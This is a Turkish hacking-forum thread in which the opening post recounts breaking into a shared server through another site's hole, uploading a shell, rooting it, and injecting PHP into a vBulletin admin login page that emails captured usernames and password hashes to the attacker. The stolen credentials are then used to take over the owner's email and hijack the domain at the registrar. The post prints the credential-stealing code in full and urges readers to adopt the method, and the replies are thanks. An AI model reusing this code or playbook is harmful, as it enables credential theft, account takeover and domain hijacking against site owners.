Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Domain Hack&Hijack Güzel Bir Taktik
cLowN
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 16 / 236
Deneyim: 44 / 100
Rep Sayısı: 9
Mesaj Sayısı: 130
Üyelik Tarihi: 19.08.2013
     
Yorum: #1
Domain Hack&Hijack Güzel Bir Taktik
18.02.2014 01:02
ALINTIDIR!

Selamun Aleyküm Arkadaşlar.

Bu Konuda Başımdan Geçen Bir Domain Hack Yöntemini Yazacam, Sadece Tecrübe Edinebilmeniz İçin Yazılmıştır.

Geçtiğimiz Günlerde Bir Servere Girdim Serverdeki Sitelerden Birinin Domaini’ni Almam Gerekiyordu. Biraz Düşündüm Ne Yapabilirim Diye ve Sonuç Olarak Aşağıda Yazdığım Yöntemle Hedef Sitenin Domainini Aldım.

Önce Hedef Site Üzerinde Bir İnceleme Yaptım, Ancak Site VBulletin Son Sürümüydü ve Lisanslı Bir VB Script Kullanmaktaydı. Hal Böyle Olunca Serverdeki Diğer Siteleri İncelemeye Geçtim. http://www.*******.com da Açık Buldum Açık Sayesinde Servere Shell Upload Edip Bağlandım. Serveri Rootladım ve Hedef Siteye Ulaştım. Ancak İndex Atmadım. Amacım İndex Atıp Çıkmak Değildi. Domaini Almaktı.

Sitenin admincp/login.php Dosyasını Çektim. İçine Kendi Yazdığım Kodu Enjecte Edip Kapattım. Aradan Bir Hafta Geçti Mailime Eklediğim Kod Sayesinde Bir Şifre Geldi. Adam Sitesine 1 Hafta Sonra Giriş Yapmış.

Şifreyi Alıp Adamın Mail Adresinde Denedim ve Mailini Aldım. Mailden Domain Firmasına Şifremi Unuttum Diyerek Şifre İstedim. ve Parola Sıfırlama Geldi. Buradan Yeni Bir Şifre Belirleyerek Domain Paneline Girdim. Domain Transfer İşlemleri vs Derken Görevi Tamamladım.

admincp/Login.php ye Yerleştirdiğim Kod Aşağıdadır.
Kod:
$kime="[email protected]";
$baslik="site şifreleri";
$EL_MuHaMMeD.="UserName : ".$_POST[’vb_login_username’]."\\r\\n";
$EL_MuHaMMeD.="şifre : ".$_POST[’vb_login_md5password’]."\\r\\n";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER[’HTTP_HOST’]."\\r\\n";
mail($kime, $baslik, $EL_MuHaMMeD);
Bunu Anlatmamdaki Sebep Sadece SQL, RFI, LFI, Vb. Açıklarla Hack Yapılmayacağını Belirtmektir. ve Farklı Bir Yöntem Olduğu İçin Ek bir Bilginiz Olsun İstedim.

Sizlerde Girdiğiniz Sitelere Sadece İndex Atıp Çıkmak Yerine Hack’i Zevkli Hale Getirmeyi Denemelisiniz. Küçük Bir PHP Kodlama Bilgisi Sizi Daha İyi Yerlere Getirecektir.
(Bu konu en son: 18.02.2014 Tarihinde, Saat: 01:03 düzenlenmiştir. Düzenleyen: cLowN.)
Alinti
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 124
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #2
Cvp: Domain Hack&Hijack Güzel Bir Taktik
18.02.2014 21:37
Eyvallah tsklee kardesim guzel dokuman...


Alinti
WesT
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 12
Yaşam Puanı: 29 / 295
Deneyim: 83 / 100
Rep Sayısı: 1
Mesaj Sayısı: 190
Üyelik Tarihi: 17.12.2013
     
Yorum: #3
Cvp: Domain Hack&Hijack Güzel Bir Taktik
18.02.2014 23:34
saol kardeş eline sağlık
Alinti
cLowN
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 16 / 236
Deneyim: 44 / 100
Rep Sayısı:
Mesaj Sayısı: 130
Üyelik Tarihi: 19.08.2013
     
Yorum: #4
Cvp: Domain Hack&Hijack Güzel Bir Taktik
19.02.2014 00:05
El Muhammed yaparda iyi olmazmı Smile
Alinti
acilservis12
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 12
Yaşam Puanı: 24 / 276
Deneyim: 5 / 100
Rep Sayısı: 1
Mesaj Sayısı: 169
Üyelik Tarihi: 28.10.2013
     
Yorum: #5
Cvp: Domain Hack&Hijack Güzel Bir Taktik
14.04.2014 22:53
sağol kardeş
Alinti



1 Ziyaretçi